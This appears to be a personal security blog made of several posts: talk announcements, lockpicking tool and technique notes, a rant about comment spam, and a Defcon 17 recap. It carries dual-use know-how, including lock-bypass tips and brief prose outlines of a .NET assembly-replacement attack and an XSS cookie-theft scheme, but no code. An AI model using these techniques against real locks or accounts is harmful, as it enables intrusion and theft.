This week, I’ll be doing three neat security events, and you are invited!

Wednesday morning, I’ll be speaking at the Central Ohio ISSA about Windows Identity Foundation, OpenID and Claims Based Authentication. Details are here. This is the topic description:

“Escalation of privilege is based on a model of security that is driven by roles and groups for a given application. I am in the Administrator role, the Accounting group contains your username. What if instead you carried a token with a verifiable set of claims about your identity? One that is encrypted, requires no round trip to an authorization server, and can be coded against in a native API? Would that bring more security to our government and medical applications? Or is it just as full of holes as everything else? Join Bill in checking out Claims Based Security via Windows Identity Foundation, and see if it fixes problems or is the problem.”

That evening (wshew!) I’ll be giving a presentation on high-security locks at the Columbus Locksport International meeting at the Columbus Idea Foundry.  You can sign up here. Please RSVP if you are coming, because we need to plan for a crowd if we have one.  I’ll be covering security pins, and the idea behind sidebar locks.

Then, Friday, I’ll be at B-Sides Cleveland giving the WIF talk again.  It’s at the House of Blues, and I’ll be talking at 10AM.  The conference is sold out, though.  Too bad - it sounds like an awesome lineup, and I am just floored to be among them. Freaking ReL1K is speaking – he built the Social Engineer’s Toolkit for crying out loud. I’m truly honored.  I am looking forward to this.

Deviant Ollam, the guy who taught me (and Gabrielle) how to pick locks at Defcon 15, has a new book out, Practical Lock Picking: A Physical Penetration Tester's Training Guide.  I recommend that everyone get a copy, without ever having seen a page of it.  Fact is, Deviant has a passion for teaching - and not just lockpicking.  He is a wealth of information and a guru of many topics.  What's more, he is so very good at expressing them. 

Anyone who has been to Columbus L.I meetings and seen me to an intro presentation knows that I use DOs Intro to Lockpicking deck that he gives at Defcon.  His site, www.deviating.net/lockpicking, is a wealth of information.  His presense at the carious hacker cons has done more to spread locksport than most.

If you have an interest in physical security, I pre-recommend this book.  Too bad Syngress did it, and I wasn't allowed to write Lockpicking for Dummies.  Oh well.

Went and got the mail and I was SO VERY happy to see my new picks from LockNewbie.  I got a short hook and a bogata to go with my long feeler, and replaced my existing short hook and half diamond  in my carry set.  I am still going to keep my set of bogata from Rai, because how could I not??

This should about do it for me, on a day to day carry-and-practice set.  I can get into a Master 140 in about 20 seconds using the long feeler and my custom tensioner.  Rai’s bogatas will get me into a lock with no security pins in under ten seconds usually. 

The bogata/short hook combo seems to be a great combination for spool and mushroom pins.  They have the same feel, so I can start with the handled bogata to get a false set, and then move to the VERY delicate short hook to pop the lock.

I got Gabrielle a bogata and a ball feeler too – it should work well with her picking style.  And they are RED.  All in all, very happy.

This site is getting probably twenty spam comments a day.  I know that these are inexpensive workers that are paid by the post to get past my Captcha.  They say something unrelated and put their employer's URL in the Link field of the post to increase the link count for that URL, thus increasing the Google rank for that post.  It is one of the ways that the fake SEO companies 'guarentee' you a top ten ranking for your URL.

I have a message for these people.

All comments on this site are approved by me.  I don't approve spam posts.  You are wasting your time, and taking money out of your OWN POCKET bothering to spam here.  Please leave me alone.

Now back to your regularly scheduled programming.

When teaching beginners how to pick, I find that quickly they learn that they can hold the lock up to their ear and listen for pins dropping as they release tension on the wrench.  If you have lifted pins up at all, the springs will snap them back into position with a little ‘click’.  If you know how many pins is in the lock (which you should) they you can ‘see how close you were.’

This doesn’t work.

There are two common errors in beginning lockpicking.  The first is too much tension.  This is a problem because if you rotate the cylinder within the lock too much, every pin will feel like it is binding.  You will hold both pins against the shear no matter what, and you’ll get a very bad level of feedback of actually lifting over the shear line.

The second mistake is overlifting.  Few people know how little pressure is required to actually life the key pin, and it is common the just ram the whole pin stack all the way to the roof witho0ut stopping at the shear line – a problem complicated by providing too much tension.

Those two problems combine for a false sense of what is happening inside the lock.  If you lift all of the key pins into the shear line – very easy on cheap locks – and then release tension, you’ll be able to hear all of the pins drop.  This causes the ‘oh, but I had it, ‘cause I could hear them drop’ problem.  The problem is that you didn’t have it, there is nothing wrong with the lock, you just overlifted.  It’s a common problem.

The best thing you can do is not listen at all in my opinion.  It’s like sniffing the cork when tasting wine – it’s not going to tell you anything.  The sommelier offers you the cork to you can make sure it isn’t dry or crumbling – NOW so you can sniff it.  Experienced pickers listen at a lock to see if they have something in particular, not just to see if they have any pins lifted.  I sometimes listen early on, to see if my feedback is lying to me.  I try and set one pin, and then see if it snaps back.  I don’t know if it is overlifted, or just jammed into position with too much tension.  But I do know if I made one pin stick.

So, don’t listen at the lock, at least when starting out.  Trust your fingers, and start with easy locks.

Defcon 17 is in the books, and Gabrielle and I had another fantastic time.  Props go out to all of the Defcon staff.  The Locksport International team and TOOOL put another fantastic lockpicking village together.  Coffee Wars pulled a record turnout of thirty-six brews, and we met some great people there.  (We lost badly.) And thanks to the hard working goons we met.

We arrived on Thursday, but with the new Defcon 101 tracks, we were practically late.  The lines weren’t much worse than usual but there was a badge shortage right away thanks to the fine people at Chinese Customs.  Gabrielle and I ended up with paper badges at first, but Gabrielle social engineered us into two actual badges soon thereafter.

The badge, as usual, is fantastic.  Kingpin did an over-the-top job of building a sleek, simple badge that still has lots of hacking potential and out-of-the-box functionality.  It uses the 32 pin MC56F8002 processor, with a microphone and an RGB LED to produce visual effects from aural input.  Wired Magazine actually published the open source firmware.  I am not a hardware hacker, but I have been working on getting it to produce different visual output based on pitch rather than volume.

I didn’t get his name, but one of the engineering team from Freescale (the company that made the microprocessor on the badge) came to the con.  He just set up shop in the Hardware Hacking Village and helped people program the board.  It was one of the coolest things I have seen at any con.  As some of you probably know, my hardware experience is circa 1979.  He effortlessly moved between helping me with the most basic soldering questions to the most advanced programming questions.  I was blown.  Get me his address, someone.  I want to send him a bottle of Scotch.

It seemed like the traffic flow was worse at first compared to Defcon 15, but it soon leveled out.  Part of the problem was the need to clean out the rooms fully and then count them coming back in due to the fire code.  The marshals were around, and very visible, throughout the con.

There is a lot of talk about the Riv being too small.  I happen to disagree – I think that DT just needs to find a logistics volunteer that will orchestrate the talks in such a way to control the crowds.  I have seen Gabrielle do it.  It is possible.  (You hear that Jeff?  She will work for Absolut.)  The people at the Riv work their collective asses off to make it a good con and you just can’t replace that.  Let’s change the logistics instead.

Oh wait, there was technical content too!  Who knew?

The most significant thing I learned is that for all of the protections for CAS in the .NET Framework, there is a mind blowing flaw.  The framework assemblies are just called by name.  If you replace an assembly, EVERY .NET program on that machine will use the altered DLL to run the program.  Does that mean if you replace the encryption protocol to email the keys to China, that all programs will send that key to China?

Yes.

Discuss.

Props to Erez Metula.

There was a great talk on using iMacro to do screen scraping for AJAX sites, and I plan on getting some new PoCs for that up in the future.  It wasn’t rocket science, but it was a really good implementation of a simple idea that I sure as hell didn’t come with.  I mean, if it was easy, everyone would be doing it, right?  Screen scraping is a massively underused art.  There is a LOT of information out there and the web browser just sucks for really making use of it.

So much net development was done on Metasploit in the last 12 months that they got an entire track dedicated to it.  The biggest piece is undoubtedly the Oracle module, which really puts all of the disparate Oracle attacks into one place for ease in testing.  I can’t recommend its use enough if you are a pen tester or in charge of db security

The civil liberties content was significant compared to 15.  Nearly one whole track for three days was filled with lawyers telling us how not to go to jail when we fly to Italy on vacation with some music of questionable origin on our laptop.  I just popped in and out of these, but every time I did I learned something.

 Did you know that if you are asked to give up your password in the states you can say “come back with a warrant” but if you are flying overseas, they can just take the machine without your permission, copy the whole hard drive, and say “Thanks for the warez, d00d.”  Lesson learned?  Carry an empty laptop overseas and download your data set from a secure channel once you get there.   When done, upload results and clear the machine again.  Microsoft doesn’t even LET you carry a machine overseas.

Speaking of privacy (weren’t we, really?) social networking was a huge topic this year.  Tom Eston and Kevin Johnson gave a great talk on some proof of concept work they did on social networks and trust.  For instance, set up a parody account of a ‘B’ celebrity, and gain trust of followers.  Then send out a link for a fun quiz with an XSS attack.  Gain twitter cookie, get password, rinse and repeat.  Social Butterfly is another of their tools, which manages the creation of apps in social networking sites like Facebook.  It collects user accounts to be used for research purposes.  Check it out.  It’s not just that picture of the Christmas party last year that will get you in trouble on Facebook.

Locksport village was very informative, very well attended, and very well stocked.  I picked up some new equipment and finally met both Schuler Towne and Doug Farre in the flesh.  Doug and I are going to make some moves toward getting the Locksport International organization a little more, well, organized, and get things up and running there. 

Gringo Warrior was a hoot.  I supplied the live guard with a cigar (which he really needed!) and watched.  Deviant had a whole boatload full of people, and I hadn’t practiced enough, so I didn’t do it this year.  Maybe next year.  The ah-ha moment for that was watching a very accomplished picker run the whole gamut in three minutes, and then spend ANOTHER three minutes trying to open the car door.  After that, Deviant stood by the auto locks and yelled “Everyone look!!”  Took out his auto jigglers.  “Easy lock,” pop.  “Medium lock’” pop.  “Hard lock,” pop.  “GET some jigglers people!  They aren’t that expensive!”  I got some jigglers.

My Defcon moment had to be standing in the elevator lobby waiting for a ride down from my floor, when thmping bass – LOUD thumping bass – became clearly audible.  I thought “that’s one hell of a boom box.”  Wait.  Aren’t those lights?

The door opens, and there is a full mobile DJ station in the elevator.  I kid you not.  There was a mini-rave going on right there in the elevator with a DJ and dancing babes and the obligatory big white guy who can’t dance just bobbing his head and looking cool.  It had to have been the coolest thing I have ever seen in an elevator, bar none.

Can’t wait for next year, folks.  This one was fantastic.  Till then, see you at PhreakNIC!